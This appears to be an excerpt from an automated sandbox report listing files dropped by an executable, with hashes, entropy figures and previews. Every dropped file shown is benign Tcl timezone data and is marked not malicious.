                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.864308662322047
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290RRKl290ppv:MByMYbpwt290V90b
                                                                                                                                                                                                                              MD5:21D152A2359A4EFDE6DCC304F16096F3
                                                                                                                                                                                                                              SHA1:961B3CFB351615604981114A115D396D1F2006A2
                                                                                                                                                                                                                              SHA-256:46A236EC38F3A122D414208328A462B2A937392ECC6C55F673FB7A402F118D96
                                                                                                                                                                                                                              SHA-512:04A2AD6DDC2E7B0D3F95DA1C731FF553F8CBC0DD6BDFC36FB2EDCE755612103E3B4EA6F3AB7FE63CA60976538EFABF40827539DFC35B7E83129BD48471FE514B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Tortola) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9815
                                                                                                                                                                                                                              Entropy (8bit):3.8481935495337356
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:sOR864CjSAG5a9bFzN6IkWq/WHQt/RY4yP:sO664CjSAGYbGBt/M
                                                                                                                                                                                                                              MD5:9423BC81647BC4C37888860CE0518BBB
                                                                                                                                                                                                                              SHA1:37E6E6554576D1DD36C3494EAF0BD169003D870D
                                                                                                                                                                                                                              SHA-256:00B5FB8F37DFF43925C501AEAB039F39F058E002572C4203286317046CC1D700
                                                                                                                                                                                                                              SHA-512:1830CA2B62B7CA6EEB5A924D2148925DF7DD87A7B93B21F4F023E4678EF42DC20BFF57F702923E10F4382FE6757323D21414D094E99FEEB43316DE4A7E5A909E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Vancouver) {.. {-9223372036854775808 -29548 0 LMT}.. {-2713880852 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-747237600 -25200 1 PDT}.. {-733935600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-4
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):200
                                                                                                                                                                                                                              Entropy (8bit):4.914983069791254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290RXgr490ppv:MByMYbpwt290xg090b
                                                                                                                                                                                                                              MD5:9F7DA15BE387B8F7DEC5DFFE069F3505
                                                                                                                                                                                                                              SHA1:D298B963B0048E9ECA3BC7B85248506AB1388479
                                                                                                                                                                                                                              SHA-256:561D9D04B0CE0F96A9C351C7D5C30AA1D5A42A3D70066CD9AF0DA6CBC5388DBE
                                                                                                                                                                                                                              SHA-512:606C2A918633C74BD2954D39B00EFA2CD9DA852BC7034F129A04258A65DC74942FA0826E9BC6E4433926E7F1375612554B04845077E434D0CD3BD15832DC6B95
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Virgin) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2971
                                                                                                                                                                                                                              Entropy (8bit):3.9652694533791917
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5CeFvmpn4nRfngnSSXRwEg7MkwY7Twbg7Uwr70vwHg7b6wa7gAHwc7/wzZg7ywJP:5BmCKpj/AOZFCARCeQbvb5wxMN6Ix
                                                                                                                                                                                                                              MD5:2F2D39B5FB844E170FA7B6AF11B948CA
                                                                                                                                                                                                                              SHA1:3D89672134D979FCF65225A58249380D9C8A4A65
                                                                                                                                                                                                                              SHA-256:8E0BC71BD7146145DDE3C064AE205DF08124FE2402853A9655B0EB799E90F31F
                                                                                                                                                                                                                              SHA-512:6C046D1133C8CCF697C8FB553A1F539948F71FA80BA447B87AA8D1D1D7113B32A6B764C5C1734C615319A27961B6116FCA087EB571869119BE87656FCA351498
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Whitehorse) {.. {-9223372036854775808 -32412 0 LMT}.. {-2188997988 -32400 0 YST}.. {-1632056400 -28800 1 YDT}.. {-1615125600 -32400 0 YST}.. {-1596978000 -28800 1 YDT}.. {-1583164800 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-147884400 -25200 1 YDDT}.. {-131554800 -32400 0 YST}.. {315561600 -28800 0 PST}.. {325677600 -25200 1 PDT}.. {341398800 -28800 0 PST}.. {357127200 -25200 1 PDT}.. {372848400 -28800 0 PST}.. {388576800 -25200 1 PDT}.. {404902800 -28800 0 PST}.. {420026400 -25200 1 PDT}.. {436352400 -28800 0 PST}.. {452080800 -25200 1 PDT}.. {467802000 -28800 0 PST}.. {483530400 -25200 1 PDT}.. {499251600 -28800 0 PST}.. {514980000 -25200 1 PDT}.. {530701200 -28800 0 PST}.. {544615200 -25200 1 PDT}.. {562150800 -28800 0 PST}.. {576064800 -25200 1 PDT}.. {594205200 -28800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9695
                                                                                                                                                                                                                              Entropy (8bit):3.8209220355628766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pOEhc8/rvNZONqXXyIjNA604qSScBgN+4ctDzIVQ/c/3hNxTh:pY8DvbO+A604qSBgI7DBch
                                                                                                                                                                                                                              MD5:E8DB00D2B99B308018F4F5E48AC47C3A
                                                                                                                                                                                                                              SHA1:8841467CB264DC9F87FABAADBE90EE2C8DACC80F
                                                                                                                                                                                                                              SHA-256:F3FC5F6D93D1D9EB0F3DED33873F33C47F841797D96439966F8E0A5A189941FA
                                                                                                                                                                                                                              SHA-512:5D684B07332ED53F9F8CB71FFF3B6D0F848426A5E4D9E7DA84E49E358C666F1C3BB9CF21352D939B35B558FC691839E24BC84656317F73C768B474AF5AC480EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Winnipeg) {.. {-9223372036854775808 -23316 0 LMT}.. {-2602258284 -21600 0 CST}.. {-1694368800 -18000 1 CDT}.. {-1681671600 -21600 0 CST}.. {-1632067200 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1029686400 -18000 1 CDT}.. {-1018198800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-746035200 -18000 1 CDT}.. {-732733200 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620755200 -18000 1 CDT}.. {-607626000 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8683
                                                                                                                                                                                                                              Entropy (8bit):3.957710943557426
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:po1acs6yyyxC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:p4acsW9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:18EC35FCEC15CE9304818E22222411EF
                                                                                                                                                                                                                              SHA1:F4A04B3E2B5F55C9582F578C3142E706C4EB6BD6
                                                                                                                                                                                                                              SHA-256:79B44F245D86A4EC299D1A9A2EDB2AB92D50AB5A7C1C03759D283AC4070F9005
                                                                                                                                                                                                                              SHA-512:40AC47AC278DF22C7ECFF568456E7C3767B38701B9A2E2639C2201DC53CDD794CF7521BCB773A8AF2A8D4A034D3BBD35BF9788FB5B4E4D51A7A139B3B3353479
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Yakutat) {.. {-9223372036854775808 52865 0 LMT}.. {-3225223727 -33535 0 LMT}.. {-2188953665 -32400 0 YST}.. {-883580400 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-757350000 -32400 0 YST}.. {-31503600 -32400 0 YST}.. {-21474000 -28800 1 YDT}.. {-5752800 -32400 0 YST}.. {9975600 -28800 1 YDT}.. {25696800 -32400 0 YST}.. {41425200 -28800 1 YDT}.. {57751200 -32400 0 YST}.. {73479600 -28800 1 YDT}.. {89200800 -32400 0 YST}.. {104929200 -28800 1 YDT}.. {120650400 -32400 0 YST}.. {126702000 -28800 1 YDT}.. {152100000 -32400 0 YST}.. {162385200 -28800 1 YDT}.. {183549600 -32400 0 YST}.. {199278000 -28800 1 YDT}.. {215604000 -32400 0 YST}.. {230727600 -28800 1 YDT}.. {247053600 -32400 0 YST}.. {262782000 -28800 1 YDT}.. {278503200 -32400 0 YST}.. {294231600 -28800 1 YDT}.. {30995
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7737
                                                                                                                                                                                                                              Entropy (8bit):3.8656193813344064
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:42GaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:uPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:A7606AE597027C26BC90702B2BCC80E9
                                                                                                                                                                                                                              SHA1:7B2AB2E0A23B8D770D1305A171DBCCE2D471EF2F
                                                                                                                                                                                                                              SHA-256:B33838F12640C64BA4F10F50657EC4D8D5B30FD226DA4ACA21B169B53AD30576
                                                                                                                                                                                                                              SHA-512:B18711B4110D6DB0CC7A6EF66639E1B38323F0B61DA4F5287A51BC9EC8534133568C6D3E4F18F6328564DAD291E0CA707768DE4478DD502A40FFD189C08114A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Yellowknife) {.. {-9223372036854775808 0 0 -00}.. {-1104537600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-147891600 -18000 1 MDDT}.. {-131562000 -25200 0 MST}.. {315558000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):478
                                                                                                                                                                                                                              Entropy (8bit):4.205595904143294
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2L09xSDm2OHE5QMFUH+KNUoTVsBEE0ZZICxZbDtVby:MB862LcUmdHE5QMFi+KdTVPZIwXDy
                                                                                                                                                                                                                              MD5:7D8132A23238C14CCEDD520BBEB49F77
                                                                                                                                                                                                                              SHA1:A8BAE9269DAA2AC535B292E1AE8632B451A0BBA5
                                                                                                                                                                                                                              SHA-256:04247ACB2B4FA126D13F4573FF74D15A89CF42B2C5CD7E688D5BB1C1FD3972BF
                                                                                                                                                                                                                              SHA-512:74FCB14037B0AE11A95B036791D69037590F8EC7F09D90A866E6A6CAAD6D58E4EC3723A3BB356FBF0E25ED1239A5820A8513EBF6653578E4BFB8988D6D20EF13
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Casey) {.. {-9223372036854775808 0 0 -00}.. {-31536000 28800 0 +08}.. {1255802400 39600 0 +11}.. {1267714800 28800 0 +08}.. {1319738400 39600 0 +11}.. {1329843600 28800 0 +08}.. {1477065600 39600 0 +11}.. {1520701200 28800 0 +08}.. {1538856000 39600 0 +11}.. {1552752000 28800 0 +08}.. {1570129200 39600 0 +11}.. {1583596800 28800 0 +08}.. {1601740860 39600 0 +11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                              Entropy (8bit):4.360007144607037
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2L0mDm2OHEfwz0/MVSYyF/KZ7VoX/MVSYyF/VpVQVF9RXhNXSMVSYy6:MB862LVmdHEIjsF/KZOksF/Vp6v9RRFl
                                                                                                                                                                                                                              MD5:97AA556F7EF06786B76316133794F4E9
                                                                                                                                                                                                                              SHA1:B3CDA284DE80987B954E2CC9BFA3ED33462CDD4F
                                                                                                                                                                                                                              SHA-256:2F36D2E13D7E251322B7A7B30F39645393525CEB49A2B5C26F27797F2AAF4D7F
                                                                                                                                                                                                                              SHA-512:14C6F17252C2AC89D86FE00BD8A8934D627C85478B0AB08AB6237988922D18616B00878498FFFC0E1978308BC6D775E2DC3ADCEF827AB0A06B214BE4DDABAB52
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Davis) {.. {-9223372036854775808 0 0 -00}.. {-409190400 25200 0 +07}.. {-163062000 0 0 -00}.. {-28857600 25200 0 +07}.. {1255806000 18000 0 +05}.. {1268251200 25200 0 +07}.. {1319742000 18000 0 +05}.. {1329854400 25200 0 +07}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):214
                                                                                                                                                                                                                              Entropy (8bit):4.938579775653117
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yci/452HAIgObi/4oA6N/2L0/3Zp5/4pv:MByMdNXiU5t2Lkwv
                                                                                                                                                                                                                              MD5:CC22302B9FAE52E36A2A35C0361E774B
                                                                                                                                                                                                                              SHA1:45CFD95A5821C4C4FDF2E1519F08029FF0BE664B
                                                                                                                                                                                                                              SHA-256:96F2AB9A9FFCD10598FDF105F68460CC4B4EBC1F18054D1BC8E39DF6AD24D1AC
                                                                                                                                                                                                                              SHA-512:FC9084D7B16EAA985681762F2658D32C77EE186D8D3C7225093CC5CB4A6AEB74A3D0A41A904EB6C8AEF7DB110A89497BAFAF811BBC26103F96E5E1D4D4E1002A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Antarctica/DumontDUrville) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8447
                                                                                                                                                                                                                              Entropy (8bit):3.850137279218428
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:s1qigkx6WsYyS391QiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:s1q05h1QiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:81C612A1544910544173687C416841C6
                                                                                                                                                                                                                              SHA1:4A707B403F0B9556A3D3D50B08BE0F56660F3F0B
                                                                                                                                                                                                                              SHA-256:C4EA7F1C0B5A0FAE653419F1C6D058BDDD745A3CDBA11900005C157DF23DDC01
                                                                                                                                                                                                                              SHA-512:122E2DC3D8D61CCDB83E03C9487DD29AABE7AB3F71FE4F6315209AF0BBCFD01FBDC3A1E3F6D910FB0D690378DF852170A9819D8C1EF96BE6BC8C0811BFB453A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Macquarie) {.. {-9223372036854775808 0 0 -00}.. {-2214259200 36000 0 AEST}.. {-1680508800 39600 1 AEDT}.. {-1669892400 39600 0 AEDT}.. {-1665388800 36000 0 AEST}.. {-1601719200 0 0 -00}.. {-94730400 36000 0 AEST}.. {-71136000 39600 1 AEDT}.. {-55411200 36000 0 AEST}.. {-37267200 39600 1 AEDT}.. {-25776000 36000 0 AEST}.. {-5817600 39600 1 AEDT}.. {5673600 36000 0 AEST}.. {25632000 39600 1 AEDT}.. {37728000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {28932480
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.7511104559982
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2L0GRHEzyeyFNMXGm2OHvavFeVU/VPKVVFSTVF9svUX0VQr:SlSWB9eg/2L0zyfXDm2OHEVy/Ur9s/Vg
                                                                                                                                                                                                                              MD5:7A2AD9BD8F8DEE5C600CABF2D5E9D07B
                                                                                                                                                                                                                              SHA1:CF5D230A29946B7FA3ECD8EB99F1EF1BF0FA5B50
                                                                                                                                                                                                                              SHA-256:ACA533B8BC82296373EDEC82F6E0AA45A34D817C7C18FF5E8E94B81C0BD30259
                                                                                                                                                                                                                              SHA-512:95F8FA68735E88AB15C403191928FA4AA5D1628453BE64B87EE7E8DF9F35FB5DA74A3CED5F5289A13D84A8A12BBB86734E578059CA8B6405399CFF5E33C9384C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Mawson) {.. {-9223372036854775808 0 0 -00}.. {-501206400 21600 0 +06}.. {1255809600 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.880387042335617
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3ycqXHAIgObOvRN/2L0z6/fy:MByMdTiYt2LrK
                                                                                                                                                                                                                              MD5:88EE32AE5C538AEBFDE2D1D944ED5B2B
                                                                                                                                                                                                                              SHA1:55E7234E6FFF298182A6C8889A9F506CDCE7C959
                                                                                                                                                                                                                              SHA-256:E9D99293C5B275D8E0D7B066084177EDF670D5B52B81E87608BAB02025F33155
                                                                                                                                                                                                                              SHA-512:45A3EA146CA719BA6F22E99EAA57AC1DED1C762E19BDFBA176E5FEAC36EC58586F771572DD16ACE09E660F97DEB91A701BA1B1F1AEF3BD8688F3451C0772420A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:Antarctica/McMurdo) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2613
                                                                                                                                                                                                                              Entropy (8bit):3.6082359166067905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5fzJS6S4wRSenSOaf7HSKSkSqS7STslSmSMSCSxygSiXS/SrS+S9SfShS7SoSlSL:jdeRtnxaf7HlPlgiot7JC/Xk8NWse4rf
                                                                                                                                                                                                                              MD5:BDFA5908E735F866FEC16F6B481AD385
                                                                                                                                                                                                                              SHA1:524AEE21BB97D923A8812A5722AF2FEA43B4D971
                                                                                                                                                                                                                              SHA-256:1637381A20E9D5C6A530F110BDB08D9515E675C9206F000407D8511074948E61
                                                                                                                                                                                                                              SHA-512:3D65C7941BA15A698264848F9B6F43ED5B63D4CF86D495334E8E1DC381D63435E9424BBBC389229693D20044FDB8425A7CC805AB5EA055F59D3E0DD4C7AC2A28
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Palmer) {.. {-9223372036854775808 0 0 -00}.. {-157766400 -14400 0 -04}.. {-152654400 -14400 0 -04}.. {-132955200 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-101419200 -10800 1 -04}.. {-86821200 -14400 0 -04}.. {-71092800 -10800 1 -04}.. {-54766800 -14400 0 -04}.. {-39038400 -10800 1 -04}.. {-23317200 -14400 0 -04}.. {-7588800 -10800 0 -03}.. {128142000 -7200 1 -03}.. {136605600 -10800 0 -03}.. {389070000 -14400 0 -04}.. {403070400 -10800 1 -04}.. {416372400 -14400 0 -04}.. {434520000 -10800 1 -04}.. {447822000 -14400 0 -04}.. {466574400 -10800 1 -04}.. {479271600 -14400 0 -04}.. {498024000 -10800 1 -04}.. {510721200 -14400 0 -04}.. {529473600 -10800 1 -04}.. {545194800 -14400 0 -04}.. {560923200 -10800 1 -04}.. {574225200 -14400 0 -04}.. {592372800 -10800 1 -04}.. {605674800 -14400 0 -04}.. {624427200 -10800 1 -04}.. {63712
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):151
                                                                                                                                                                                                                              Entropy (8bit):4.829975802206526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2L0GRHEsKRsMXGm2OHvavFN/H3VVFVGAvFv:SlSWB9eg/2L0rRsDm2OHEN/VVFAKV
                                                                                                                                                                                                                              MD5:C330982049AA053DA62B926627D2F2FA
                                                                                                                                                                                                                              SHA1:050CE68265F1A183F0173C825AC59EAE8B6AB9EB
                                                                                                                                                                                                                              SHA-256:943F10D8E836773F0B7ACD13ED8422C0B27813C7BBE0B09B57697D1D70D21ECE
                                                                                                                                                                                                                              SHA-512:DE9953D0E505D6B110C0CC4E756B5B0311646C9CA4703A33B92147D36CFB4C288D73851E6766CE1432F41AB51B5D0A1D58680BDB4E28F067E1D36F670B4A192E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Rothera) {.. {-9223372036854775808 0 0 -00}.. {218246400 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):198
                                                                                                                                                                                                                              Entropy (8bit):4.906125935761354
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3ycqXHAIgObOvRN/2L0tlo+ply:MByMdTiYt2LMq+p8
                                                                                                                                                                                                                              MD5:8095A3749DBDE05377836D74A4EEFE33
                                                                                                                                                                                                                              SHA1:6987CA972B63AE26A65654961588D51D3EF2166C
                                                                                                                                                                                                                              SHA-256:88057832175BB642B23FC99F788A2F78A24005CF1F84A7B1B5E8C84FB8F4D4C1
                                                                                                                                                                                                                              SHA-512:9066104C9C16D2AB88523D651C74CE268468E093A497D128D0D12A986BD62DBC1388A56ED1737C2AFACF04185CF06FD0EE66797A3390B2F0E1EB08A4D92AAFAD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:Antarctica/South_Pole) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.871844665431957
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2L0GRHEtWlFBQWFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2L0tQB
                                                                                                                                                                                                                              MD5:CA52057130DCF506D11A7CC069F4FBA3
